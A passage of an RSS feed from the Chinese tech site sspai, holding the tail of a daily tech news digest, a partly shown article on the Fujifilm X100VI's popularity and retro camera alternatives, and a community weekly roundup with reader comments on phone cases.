将打击包含广告拦截功能的第三方应用</h3><p>YouTube 于 4 月 16 日宣布加强对违反服务条款的第三方应用程序的检测力度，特别是包含广告拦截公告的应用程序。用户使用此类替代客户端查看视频时，系统会提示「此应用程序不提供以下内容」或「缓冲失败」。YouTube 的服务条款中不允许第三方应用程序关闭广告，因为这样会妨碍创作者获得播放收益。对于不想看到广告的用户，官方建议订阅 YouTube Premium 服务。<a href="https://support.google.com/youtube/thread/269521462/enforcement-on-third-party-apps">来源</a></p><h3>百度发布 AI 原生操作系统 DuerOS X</h3><p>4 月 16 日举行的 Create 2024 百度 AI 开发者大会上，小度科技宣布推出「全球首个 AI 原生操作系统」DuerOS X。该系统基于百度文心大模型，在多模态感知和拟人化呈现方面「有重要突破」，百度表示通过 DuerOS X 小度能为用户提供更加自然、智能的交互方式，人机交互体验将「实现质的飞跃」。</p><p>DuerOS 是百度在 2017 年推出的对话式人工智能操作系统，目前用于小度智能音箱等产品，此前已经迭代到 7.0 版本。<a href="https://www.pingwest.com/w/294113">来源</a></p><h3>微软将终止对 Office 2016/2019 的支持</h3><p>微软于 4 月 16 日宣布 Office 2016 和 Office 2019 应用程序及相关生产力服务的支持结束（EOS）的日期：2025 年 10 月 14 日之后，Office 2016 和 Office 2019 套件的所有应用都不会再获得安全更新、错误修复和技术支持。微软建议安装以上版本套件的企业转而使用 Microsoft 365 E3 的订阅，如果企业尚未准备好购买订阅，也可以选择 Office 长期服务通道。Office LTSC 2021 的 EOS 日期是 2026 年 10 月 13 日，此前微软也计划在 4 月晚些时候为企业和组织推出 Office LTSC 2024 预览版，该版本将获得五年支持。<a href="https://www.neowin.net/news/microsoft-will-end-support-for-office-2016-and-2019-apps-and-servers-on-october-14-2025/">来源</a></p><h2>看看就行的小道消息</h2><ul><li>外媒 Android Authority 从 Google 内部人士处获悉，今年秋季发布的 Pixel 9 系列将包含四款机型，包括直板机型 Pixel 9、Pixel 9 Pro、Pixel 9 Pro XL 以及折叠屏机型 Pixel 9 Pro Fold。而 Pixel 9 Pro Fold 则是由此前的 Pixel Fold 2 改名而来。此前 Google 将 Pixel Fold 作为其二线产品线，和 A 系列一样在秋季发布，此次纳入旗舰产品线的发布阵列或许将进一步完成 Pixel 旗舰产品线的整合。<a href="https://www.androidauthority.com/google-pixel-9-pro-fold-name-3433990/">来源</a></li></ul><h2>少数派的近期动态</h2><ul><li>由用户提供产品创意、由少数派实现孵化落地的快捷指令手机壳 BANG!CASE，已顺利完成超前预售。现在起到 5 月 6 日正式发售前，仍可以 199 元（原价 259 元）的优惠价格购买，并获得 3 个月少数派会员、站内特制徽章等权益。我们还于近日上线了 BANG!CASE 专题页，除详尽介绍产品功能外，还提供专为 BANG!CASE 打造的壁纸下载，欢迎浏览了解。<a href="https://sspai.com/page/bangcase"><strong>前往专题页</strong></a></li></ul><figure class="image ss-img-wrapper image_resized" style="width: 450px;"><img alt="PKT9bhmkRoHTLvxZ4PEcLbPpnrL" src="https://cdn.sspai.com/editor/u_/cofb03db34te0f7uaq50.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><ul><li>少数派渠道开启「赛博复古」季，我们为你准备了 3 条视频、1 篇文章，还有一场线下活动。请关注 <a href="https://weibo.com/u/1914010467">少数派微博</a>、<a href="https://www.xiaohongshu.com/user/profile/63f5d65d000000001001d8d4">小红书</a> 了解更多详情。</li></ul><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/0e7d61df455d8055fbdb90902e0c3eec.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1/format/webp" /></figure><ul><li>少数派将联合飞傲和广州四家独立唱片店 Portal、Soulless Tune、臻音堂和 Disc Joker 举办 2024 年度「国际唱片日 Record Store Day」活动。时间为 4 月 19 ~ 21 日，届时现场将有唱片折扣、飞傲磁带机 CP13 优惠套装、线下演出等等，还有店主们特别录制、制作的限量磁带可以通过打卡或消费获得。对唱片文化感兴趣的朋友可以在公众号、小红书搜索店铺关键字关注对应的帐号，也可以关注 <a href="https://weibo.com/u/1914010467">少数派微博</a>、<a href="https://www.xiaohongshu.com/user/profile/63f5d65d000000001001d8d4">小红书</a> 了解更多后续信息。</li></ul><figure class="image ss-img-wrapper image_resized" style="width: 450px;"><img src="https://cdn.sspai.com/2024/04/16/da1749e4fbcbace4e80494b87808f198.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1/format/webp" /></figure><h2>你可能错过的文章</h2><ul><li><a href="https://sspai.com/prime/story/xv100vi-retro-cameras">电子茅台与不驯灵魂：X100VI 漫谈，以及更多的复古相机选择 ｜ 少数派会员 π+Prime</a></li><li><a href="https://sspai.com/post/88118">社区速递 040 | 季度作者、跑出半马、海鸥双反以及派友手机壳大推荐</a></li><li><a href="https://sspai.com/post/87870">Ghidra 逆向工程实战：看看 macOS 恶意软件动了什么手脚</a></li><li><a href="https://sspai.com/post/88067">小米 14 Ultra 摄影相关的高强度使用体验总结</a></li></ul><p>&gt; 关注 <a href="https://sspai.com/s/J71e">少数派公众号</a>，解锁全新阅读体验 📰</p><p>&gt; 实用、好用的 <a href="https://sspai.com/mall">正版软件</a>，少数派为你呈现 🚀</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/87683</id>
            <title>电子茅台与不驯灵魂：X100VI 漫谈，以及更多的复古相机选择</title>
            <link>https://sspai.com/post/87683</link>
            <guid isPermaLink="false">https://sspai.com/post/87683</guid>
            <pubDate></pubDate>
            <updated>Tue, 16 Apr 2024 10:01:32 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 富士胶片, X100VI, 胶片风, 消费心理
<br>
<br>
总结: 2024年4月20日，富士胶片发布了一款名为FUJIFILM X100VI的新相机，售价11390元。X100VI在市场上引起轰动，成为新时代的赛博茅台、电子期货。消费者追捧X100VI的原因在于其胶片风格、易用性和富士文化的影响。富士准确捕捉了消费者对复古摄影的需求，通过工业化生产满足了消费者的个性化需求。市场现象反映了消费者对产品独特性和个性化的追求。 </div>
                        <hr>
                    
                    <p>2024 年 2 月 20 日，富士胶片（中国）发布了一款名为FUJIFILM X100VI 的新相（kong）机（qi），「仅售」11390 元。消息一出，网上骂声一片，「残幅机也敢卖一万」之类的评论不绝于耳。</p>
<p>发售当天，仅各平台官方直营店已有超过十七万人预约，并在几天后猛增至几十万人。二手交易网站更是变成了黄牛们的狂欢，消费者往往需要加价三千至五千才能买到；更有好事之人开出超过两万的高价，远远超出部分二手徕卡全画幅数码相机的价格。「不是 X100VI 买不起，而是 M9 更有性价比」的玩笑在 2024 年竟然成真。X100VI 已经逐渐脱离作为相机的工具属性，而成为新时代的赛博茅台、电子期货。</p>
<figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/03/30/article/d54860eccf12671e44fc5d6bdce23b01.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" />
    <figcaption>富士京东直营店近况：没货学什么别人做买卖</figcaption>
</figure>
<h2>X100VI 热卖背后的独特生态位和消费心理</h2>
<p>X100 系列的外观是一脉相承的，为什么从第五代 X100V 开始才格外一货难求呢？</p>
<p>从外部原因上说，2019 年以来，以小红书为首的社交媒体透过通过精确的算法精确触达到广大的目标消费者，在他们心里埋下了「复古」「胶片」「仪式感」的种子。</p>
<p>近两代 X100 也确实具有独特的核心竞争力：一如既往的旁轴造型让人爱不释手、重新设计的镜组大幅改善了球差，提升了最大光圈的可用性、可用的对焦系统、同时还带来了 CLASSIC Neg. 为首的胶片模拟色彩，让消费者更轻松地参与复古仪式感中。</p>
<p>以往，如果需要实现胶片风格的照片，除了极少部分技术顶尖的调色大师，其他人多半还是只能够购买胶片相机。但是使用胶片相机有一定的门槛，从胶卷的选择、相机的操作，胶片的冲扫，需要掌握一定的专业知识，同时还得面临很多的不可控性：胶片保存环境、相机损坏的概率、冲洗胶卷药水是否新鲜，不同扫描仪型号带来的不同调色特点。如果使用哈苏扫描仪扫描，那用户多半还得自己上手校色。而 2018 到 2020 年开始一波接一波的胶片涨价和停产潮，更是基于了胶片摄影沉重的一击。</p>
<p>但使用富士就不用担心。只需要像普通数码相机一样对焦、拍照，选择好适当的胶片模拟风格，就可以轻松实现满满「胶片风」的照片。他们甚至不需要自己进行后期调色，也不用担心胶片模拟的风格不够「胶片」：毕竟这是富士的产品，还有比它更有发言权的什么是「胶片风」吗？</p>
<p>——是的，相比于其他厂商，富士还有一个文化上的优势：通过构建起一条从胶片到胶片相机再到数码相机的完整链条，加之数十年的文化积累，它有足够的底气定义什么叫「日系」和「胶片风」。它本身已然成为了一种文化符号，代表八九十年代的往日的美好。</p>
<p>富士告诉消费者，胶片风不代表黑得离谱的暗角、以及整体发黄的偏色，而是一种高光和阴影部分的一种轻微的色相偏移。通过数字代码，这种以往通过化学方式才能展现的、曾经不可捉摸的美，还能稳定持续地进入每一张照片里。</p>
<figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/03/30/article/764635bc7db7483f87a5fbbe0a6015b3.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" />
    <figcaption>什么是胶片风？话语权牢牢掌握在富士手里（<a href="https://fujifilm-x.com/zh-cn/products/cameras/x100vi/" target="_blank">来源</a>）</figcaption>
</figure>
<p>除此之外，富士的市场部也一直很懂得大家的心理。这方面，少数派发布过的《<a href="https://sspai.com/post/87038">打造一部「电子茅台」：聊聊富士的产品策略及市场博弈</a>》一文已经详尽分析了 X100VI 的定价策略，不再过多赘述。简而言之，独特的功能亮点佐以强硬的控价策略，再加上外围黄牛的配合，能够维持供不应求的状态。</p>
<p>那么，如何评价目前市场追捧的情绪呢？与一些观点不同，我认为没有必要过于批判，而是将其看作一种市场现象，更多关注其背后的消费决策过程。</p>
<p>作为一种「工具」，相机在发展过程中逐渐走向「标准化」，其迭代频率和所能实现的功能是可预测的。但人是追求「新奇」和「刺激」的物种。特别是新生代，买相机不只是因为需要这个工具，更是因为需要一种能够记录生活的、方式与众不同的「仪式」。连拍速度这些技术参数的意义，可能低于一种新的记录方式和生成效果带来的满足感。</p>
<p>富士准确地捕捉到了这种需求。一方面，后工业社会中，消费者需要一种形式和仪式来昭显自己的独特性；但另一方面，这种诉求仍然需要依托工业化、可复制的工具和流程来满足。富士所做的正是把人们对于「胶片摄影」的想象通过工业能力具象化，其商业上的成功也就不难理解了。说到底，消费者愿意为解决痛点、彰显个性的产品支付更高的溢价。</p>
<p>相比之下，还有一些百年老店，仍然执着于按照仿佛奥运会四年一次的频率迭代，而不愿意对消费者的消费习惯和心理做认真的调研，直到近几年看到 X100 的巨大成功才突然开窍，推出了复古外观的机型。这种机器也能引起一定的市场热情，但是可惜已经有点晚了。</p>
<p>此外，一台 APS-C 画幅的相机卖到了近万的价格，确实可谓夸张。但这样的投资是一次性的，不像胶卷是耗材，更不需要担心几个月后是不是又有什么胶片停产，以及被迫和其他消费者、经销商、倒卖者、胶片源头产商斗智斗勇。</p>
<p>因此，除了黄牛行为确实可谴责之外，我并不主张对借势造势的富士、或热情追捧的消费者过多批判。市场并没有变乱，它只是一直冷静地反映商品的供求关系。哪怕其他厂商稍微支棱一点，也不会让富士得意这么久了。相比愤懑于因为消费者没有统一战线而导致一机难求，可能我们更需要接受的是世界的参差，并从中观察出消费者购物偏好和消费力结构的演变。</p>
<h2>X100VI 以外的选择</h2>
<p>当然，能够不眨眼花一万多块去买一台高端「玩具」的消费者毕竟只是少数。那么，除了 X100VI 以外，用户购买复古相机还有什么选择呢？下面，我将尝试为大家梳理一下市面上的复古相机，包括在售的以及停产的二手机器。</p>
<p>应当指出，「复古相机」中的「复古」一词可能有以下两种解读：</p>
<ol>
    <li>外形参考历史上的胶片相机造型，或者</li>
    <li>拍摄图片效果带有胶片特点。</li>
</ol>
<p>对于前者，需要了解复古相机外形一般来说可以分成两大类：旁轴造型以及单反造型。当然，历史上的相机造型绝不止这两种，但是进入到数码相机时代以来，复古造型的相机灵感基本来自单反和旁轴。</p>
<p>至于后者，目前主要有三种方式能够实现胶片效果：</p>
<ol>
    <li>通过相机内置算法实现，例如通过颜色查找表（LUT）来映射颜色，最终让成片展现出胶片时代的胶片偏向；</li>
    <li>通过自己对比胶片照片色彩和数码照片色彩自制 LUT，然后载入至相机里；</li>
    <li>使用和前数码时代相同的 CCD 传感器。</li>
</ol>
<p>其中，第二种方法只是理论上的，因为自己制作出有「胶片味」的 LUT 实际上非常困难。如果希望图片的色彩倾向稳定，那么更现实的还是第一种和第三种方法。第一种方式中，富士处于绝对优势的地位；第三种方式则需要使用已经停产的相机，但也需要承受 CCD 的明显缺点：高感光度下画质下降严重，往往超过 ISO 400 就会有大量噪点，因此对用光环境相对比较苛刻。</p>
<p>因此，如果需要把钱花在刀刃上，需要考虑清楚自己是更加在意复古的外表还是复古的色调；想要满足的点越多，自然也会越贵。</p>
<h3>富士</h3>
<h4>X100V</h4>
<p>如果喜欢旁轴造型的复古设计，那么在售机器中可能只有这个选择了。抛弃购买难度不谈，这确实是非常成功的机器。如果希望相机颜值在线、能够稳定地输出有胶皮风格的照片、同时拥有现代数码相机应该有的画质和体验，那么买这台相机就对了。当然，如果要说缺点也是有的，包括电池不耐用，缓存少，快门声音难听，以及购买相机时硬啃溢价的难受……就看看消费者能不能接受了。</p>
<figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/03/30/article/44f2dc4d1371cccfec6c26c6df615d2a.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" />
    <figcaption>X100V（<a href="https://fujifilm-x.com/zh-cn/products/cameras/x100v/" target="_blank">来源</a>）</figcaption>
</figure>
<h4>X-S20/X-S10</h4>
<p>X-S 系列属于富士产品线里面比较年轻的产品。卖点是（第一代）（相对）低廉的价格同时搭配 CLASSIC Neg. 胶片模拟，同时拥有富士第四代相机相对可用的视频对焦功能，让消费者可以比较方便地创作胶片风格的照片。缺点是：机身用料稍逊，塑料感明显；同时对焦仅仅堪用，并不是索尼那种密密麻麻的对焦点，而是一块块相对大的对焦区域，对焦起来依然需要一点耐性。</p>
<figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/03/30/article/a6a035cdf6f3d714be7415a1994231d0.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" />
    <figcaption>X-S20（<a href="https://fujifilm-x.com/zh-cn/products/x-series/#cameras" target="_blank">来源</a>）</figcaption>
</figure>
<h4>X-T5/X-T4，X-T30II</h4>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88118</id>
            <title>社区速递 040 | 季度作者、跑出半马、海鸥双反以及派友手机壳大推荐</title>
            <link>https://sspai.com/post/88118</link>
            <guid isPermaLink="false">https://sspai.com/post/88118</guid>
            <pubDate></pubDate>
            <updated>Tue, 16 Apr 2024 09:32:45 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 社区速递, 季度创作, 本周精选, 多彩生活

总结: 少数派 Matrix 社区决定重启周报，以表彰季度创作作者和推出新星作者，同时提供专属权益奖励。本周精选内容包括工具分享和经验思考，以及多彩生活故事分享。 </div>
                        <hr>
                    
                    <p>除了首页时间流和侧栏的精选展位，少数派 Matrix 社区还有很多优秀内容因条件所限无法得到有效曝光，因此我们决定重启 Matrix 周报，并在此基础上添加更多社区内容、作者投稿新玩意以及社区产品动态呈现给大家。</p><p>希望这份「社区速递」能帮你发现更多有趣的内容分享。如果你有任何栏目内容或首页改版建议，也欢迎在评论区留言反馈。</p><hr /><h2>季度创作</h2><p>少数派编辑部目前针对现有新、老作者推出了更多专属权益，以季度为周期向新、老作者，尤其是那些在垂直内容领域持续耕耘、对网站策划内容或特别活动有突出贡献的作者，提供更多稿酬之外的附加奖励，包括付费栏目解锁资格、网站会员兑换码、实体周边礼包以及徽章系统提前解锁和特定徽章的获取资格。</p><p>在今天的社区速递中，我们首先对上一季度在少数派网站、社区崭露头角的新作者，以及在垂直领域内容持续创作、对网站特定内容策划和栏目有突出贡献的老作者进行表彰。</p><p>本季度值得关注的作者有：</p><ul><li><a class="ss-atUser" href="https://sspai.com/u/379wzx2e">@桌沿奇思</a></li><li><a class="ss-atUser" href="https://sspai.com/u/wsine">@正弦定理</a></li><li><a class="ss-atUser" href="https://sspai.com/u/hy7jhhv4">@委座大人</a></li><li><a class="ss-atUser" href="https://sspai.com/u/esrmtpt9">@食肉库玛老师傅</a></li><li><a class="ss-atUser" href="https://sspai.com/u/GiraffeBlues">@GiraffeB1ues</a></li></ul><p>本季度值得关注的新星作者有：</p><ul><li><a class="ss-atUser" href="https://sspai.com/u/marvin_cui">@MarvinCui</a></li><li><a class="ss-atUser" href="https://sspai.com/u/zq9sqij0">@_东东_</a></li><li><a class="ss-atUser" href="https://sspai.com/u/4xjk7j8g">@Wataru</a></li><li><a class="ss-atUser" href="https://sspai.com/u/suntrise">@SUNTRISE</a></li></ul><p>我们将在 14 个工作日内向以上作者发放商城周边礼包、付费栏目解锁权益、会员资格兑换码以及特别网站徽章，请注意查收。感谢各位作者一个季度以来的陪伴和创作。</p><h2>本周精选</h2><h3>工具分享</h3><p><a href="https://sspai.com/post/87943">《连点成线，在线构建节点关系图谱：NRD Studio》</a>里，<strong>荷加 </strong>的这篇文章详细介绍了他对于思维整理和知识管理的追求。他通过 NRD Studio 这个在线工具，探索了创建多个中心节点并将其通过关系连接起来的可能，形成了一个动态的、可视化的知识图谱。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/10/5bde90df1927821e005c914366f76736.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>NRD Studio 支持自定义节点样式，并提供了自动布局以及多样的图谱类型选择，同时还引入了标签、权重等管理概念，并内置了多种分析工具，使得大数据的管理变得简单高效。</p><h3>经验与思考</h3><p><a href="https://sspai.com/post/87490">《什么是笔记的理想形态？个人笔记系统折腾手记》</a>中，<strong>左岸北方 </strong>深入探讨了个人知识管理的理想形态。他通过实践卢曼卡片盒笔记法与 Obsidian 的结合，找到了一种平衡工具与笔记、减轻焦虑并专注于知识体系建设的方法。</p><p><a href="https://sspai.com/post/88037">《公司注册一年后注销-我做错了哪些事》</a>是一篇少有的文章，<strong>养鳖大亨 </strong>向我们展示了一家由学生团队创立的软件外包开发公司从注册到注销的全过程。文章中，作者详细回顾了公司的初创阶段、组织改革、对外合作以及最终面临的困境和挑战。通过这段经历，作者反思了自己在管理、决策和团队建设方面的不足，以及如何在面对困难时做出选择。</p><figure class="image ss-img-wrapper"><img alt="spurring" src="https://cdn.sspai.com/2024/04/09/article/fda61085ec2f059276d36ffef2abd102.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>英语能力是通用技能，<a href="https://sspai.com/post/87917">《我如何在一个月内显著提升英文阅读能力》</a>里，<strong>Chad </strong>为我们提供了一种实用且有效的英文阅读提升方法。作者强调了准备充足的英文阅读材料、每天定时阅读并记录生词、以及持续复习的重要性。</p><p><strong>乱麻</strong>的这篇<a href="https://sspai.com/post/88071">《如何乱麻式的选床垫》</a>为我们提供了一种全新的视角来看待选购床垫的过程（虽然有点绕）。文章中，他不仅打破了一些关于床垫的常见误区，还详细介绍了如何根据个人需求挑选合适的床垫，包括舒适度、功能、配置等方面的考量。</p><h3>多彩生活</h3><p><a href="https://sspai.com/post/87958">《这一年，我从半马132跑进130》</a>一文中，<strong>H寒峰 </strong>分享了他从对跑步的不理解到成为跑步热爱者的转变过程。文章详细记录了他为了达到半程马拉松跑进 1 小时 30 分的目标所做的努力和训练计划，以及在这一过程中的心得体会。通过坚持不懈的训练和对跑步技巧的学习，他终于在跑步上取得了显著的进步。</p><figure class="image ss-img-wrapper"><img alt="ciry marathon pass requirement" src="https://cdn.sspai.com/2024/04/10/article/8e52d164807a87492a8e9511d18b88d5.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><figure class="image ss-img-wrapper"><img alt="running core training" src="https://cdn.sspai.com/2024/04/10/article/2d3d839eb89c32c9538143e785fbf177.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>虽然最终在杭州梦想小镇半程马拉松中以 30 秒之差未能达成目标，但他的故事激励着每一位跑步爱好者继续追求自己的极限🎉。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/8dde2751d331ecdd1334b34c334958a3.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><a href="https://sspai.com/post/87863">《别让乐高吃灰！拍起来！》</a>是<strong>玩具怪咖毛子哥</strong>分享的一篇关于乐高摄影的文章，他通过这篇文章展示了如何将乐高模型通过摄影技巧呈现出不同的视觉效果，从而让乐高不仅仅是玩具，更是艺术品。文章分享了多个乐高系列的摄影作品，包括节日系列、套装系列、影视相关以及乐高自有 IP 等，展现了乐高世界的多样性和创造力。此外，作者还提到了一些国产及第三方的乐高产品，为乐高爱好者提供了更多选择。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/07/c8ca933af047e3137c89f6520631387c.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><a href="https://sspai.com/post/88001">《当爱已成往事：致敬索尼爱立信 Xperia Arc S》</a>：<strong>揪惹个咪 </strong>的文章带我们回顾了索尼爱立信 Xperia Arc S 的经典设计和那个时代的手机美学。尽管如今看来可能觉得它有着大黑边，但在当时却代表了早期的息屏美学；4.2 英寸的屏幕在当时算是大屏幕，机身最薄处只有 8.3mm，重量约 117g，堪称精致小巧。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/11/706f8044266a37aa47eac4fe3131bf87.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>文章还细致描述了手机的各个设计细节，如屏幕底部的月牙形按键、坡状小下巴、背板的人体曲线设计等，展现了索尼爱立信在设计上的独到之处。而且，索尼爱立信在 ROM 上的精致和与众不同的内在，以及它在 Android 早期的创新尝试。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/10/article/ec00ea563d96ccdfd5024ea94dd48bf1.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><a href="https://sspai.com/post/87947">《游记｜溧阳1号公路，三色轨迹，一路风光》</a>中，<strong>37丫37 </strong>带我们领略了江苏溧阳的美丽风光。作者以一家三口的自驾旅行为线索，详细记录了沿途的风景和体验。溧阳1号公路，以其 365 公里的长度，连接了众多的乡村旅游景点，成为了自驾爱好者的天堂。文章中不仅描述了公路本身的美景，还涉及了曹山未来城、七彩曹山等景点的独特魅力。</p><h3>社区摘要</h3><ul><li><strong>玉树芝兰：</strong>《<a href="https://sspai.com/post/87968">如何用 Readwise Reader 定制提示词 AI 自动辅助处理信息？</a>》</li><li><strong>区展聪：</strong>《<a href="https://sspai.com/post/87903">给理想多少时间？</a>》</li><li><strong>前院長是老白：</strong>《<a href="https://sspai.com/post/87986">你有多少数字资产可以继承给下一代？— 数字资产与数字遗产</a>》</li><li><strong>月下蔓草：</strong>《<a href="https://sspai.com/post/88010">张灯结彩的日子</a>》</li><li><strong>豌豆花下猫：</strong>《<a href="https://sspai.com/post/88065">技术周刊的转变：如何平衡热爱与现实？</a>》</li><li><strong>oiYuer：</strong>《<a href="https://sspai.com/post/88026">🎁我的一个独立开发作品：哆练单词-专注于练习的单词记忆工具</a>》</li><li><strong>德坤：</strong>《<a href="https://sspai.com/post/88051">读书笔记193《苏门答腊的郁达夫》</a>》</li><li><strong>FinnYan：</strong>《<a href="https://sspai.com/post/87938">用 coze 搭建自己的免费 GPT-4 机器人</a>》</li><li><strong>斜杠中年叨叨叨：</strong>《<a href="https://sspai.com/post/87949">35岁转行，我转的是什么？</a>》</li></ul><h2>一派热议</h2><p>在上期第 148 期一派投票《<a href="https://sspai.com/bullet/1712648287">你会使用什么手机壳？</a>》中，共有 1251 名派友热情参与，十分感谢！</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/84e2a21312f9048acfac25223b20cbb8.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>感觉派友们主要还是为了手感🌝</figcaption></figure><p><strong>自然的夏桑菊 </strong>(+34) iPhone 13 mini</p><ul><li>官方透明壳：会发黄</li><li>官方硅胶壳：会磕碰</li><li>官方皮革壳：会发臭</li></ul><p>目前用的十块钱的超薄塑料壳……</p><p><strong>克爷 </strong>(+21) 当然是 mynus</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/10/07a58c5b394066ca459c19ae1d1f7f13.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>MarvinCui </strong>(+19) 当然是 Apple 官方 Clear Case 啦～</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/09/3a306b20e9129b8d4f53a24979e1837d.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>不凡不烦 </strong>(+14) PITAKA 碳纤维</p><p><strong>广陵止息 </strong>(+10) 以前我算是清水壳（纯透明），能最直观看到手机的样子，唯一的问题是这种手机壳容易黄，不过一般来说价格不贵，黄了换一个就行。后来 Apple 自己做清水壳以后，虽然价格确实贵了些 ，但用了涂层确实不容易黄了，买一个用很久也可以接受。</p><p>不过，我现在是不带手机壳的状态，能直接感受到手机最原始的触感是真的棒。以前用清水壳的时候，有的时候会有抓不住手机的情况；又一次换新壳没到，但当时就发现不带壳以后，单手使用的负担小了很多。结果后来再也没带过手机壳，一直裸机使用至今。</p><p><strong>Hillsomec </strong>(+9) Pixel 6 的时候贪新鲜用了各种套，最后还是回到闲鱼淘的一个无名的皮质感套，不过可惜的是尺寸太大。</p><p>换了 S24 后去香港玩的时候正好见到 Bellroy 上新，直接无脑冲，手感、尺寸目前都无敌，备用的是 Spigen 。</p><p>当然时不时还是会无套，毕竟都选到小屏了，裸机手感更加无敌。</p><p><strong>zLuiyo5 </strong>(+7) 不用手机壳，因为平时不会摔手机。膜还是要贴的，屏幕裸奔久了有划痕看着很难受。</p><p><strong>华斯基 </strong>(+5) 15PM 目前买了 4 个壳：</p><ul><li>绿联磁吸透明壳 —— 临时过渡用，无功无过。</li><li>Moft 迷雾灰 —— 颜值和做工都在线，推荐！</li><li>Bellroy 皮壳 —— 不能令我满意，因为边框是硅胶的，虽然是现在常用壳，对比之下以前的苹果官方皮壳质感真的好很多。</li><li>瓦楞纹理硬壳 —— 太滑了。</li></ul><p><strong>Verfassung </strong>(+4) bellroy 的真皮。不过 S24 Ultra 的这款差一点，因为造型的原因顶部和底部多是塑胶，边框的一部分也是塑胶。Pixel 8 系列的能摸到的地方都是真皮的</p><p><strong>乔淼 </strong>(+3) 万年 UAG。</p><p><strong>JeffreyMa </strong>(+3) 当然是定制的带自己英文名的 CASETiFY 了，虽贵但是玩得开心啊。当然，女神照片的手机壳肯定不让你们看嘿嘿～</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/09/avatar/dedd7160f746c2ed15251dc0be90c040.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>HeyJude </strong>(+2) iPhone mini 的尺寸就是为了把玩，我选择直接不带壳，贴上 PDD 买的边框膜。或者买那种保护功能极度有限的塑料薄壳，6 块一个，很便宜。</p><p><strong>younglau </strong>(+2) 个人觉得第一的手机壳是 iPhone 4 的 Bumper，好看又防护，还有信号加持 buff（并不是</p><p>第二的也是 Element Case 在那个时代做的壳，兼顾好看和防护。。。说起来我连着每代都买了 BlackOps 版，直到 15 这代终结，iPhone 5 的时候就开始越来越厚重了。</p><p>当然在现今没有 Bumper 没有 Element Case 的时候，我已经买过两次 MYNUS 了，轻薄、舒服，接近裸机手感（甚至有点 iPhone 5c 的感觉。</p><p>是了，最重要的是还原裸机的手感。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/09/345dba83e96441b39a51fb3799a03428.JPG?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>kerck </strong>(+1) 用的淘宝丸匠的壳子，随便买的没想到手感出人意料的好，整体也轻薄，价格也不贵。</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/14/avatar/f71af0905d8a8b710422aba51d2629b8.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>被明月兮沛宝璐 </strong>(+1) 1、膜一定会贴，贴膜为了疏油层和顺滑手感，以及 AR 抗反射效果，壳的话看情况，裸机手感或者裸机使用体验不佳的情况下会考虑轻薄壳。</p><p>2、轻薄手感第一位，外观设计第二位。</p><p>3、同上，最近买 Evutec 的轻薄凯夫拉半包壳比较多，20g 以下的手机壳是我的最爱，材质上基本上就是 PP、超薄 PC、凯夫拉。</p><p>4、这个随缘，少则两三个，多的就多了：</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/13/99359a5af4b4350e047e35203eb7999c.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>光_ </strong>(+1) 手机壳严重影响手机使用，使得高端机与低端机手感无异。我的方案是购买屏幕保险。</p><p><strong>Kle1n </strong>(+1) 柚木沢的手机壳，这么多年一直用的他家的壳子，曲面壳手感顺滑，PC 材质轻薄，内敛又独特品味的设计完全符合我的要求，除了贵一点之外，没什么缺点。图是最近入手的落日海风：</p><figure class="image ss-img-wrapper"><img alt="" src="https://cdn.sspai.com/2024/04/11/avatar/040c435d86c4ba5763907ad558e593bc.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p><strong>minideerx </strong>(+1) 手持 14pm，用过决色的 napa 真皮磁吸壳，太重，太厚；用过爱否的超薄塑料壳，手感不好；后来用了 1 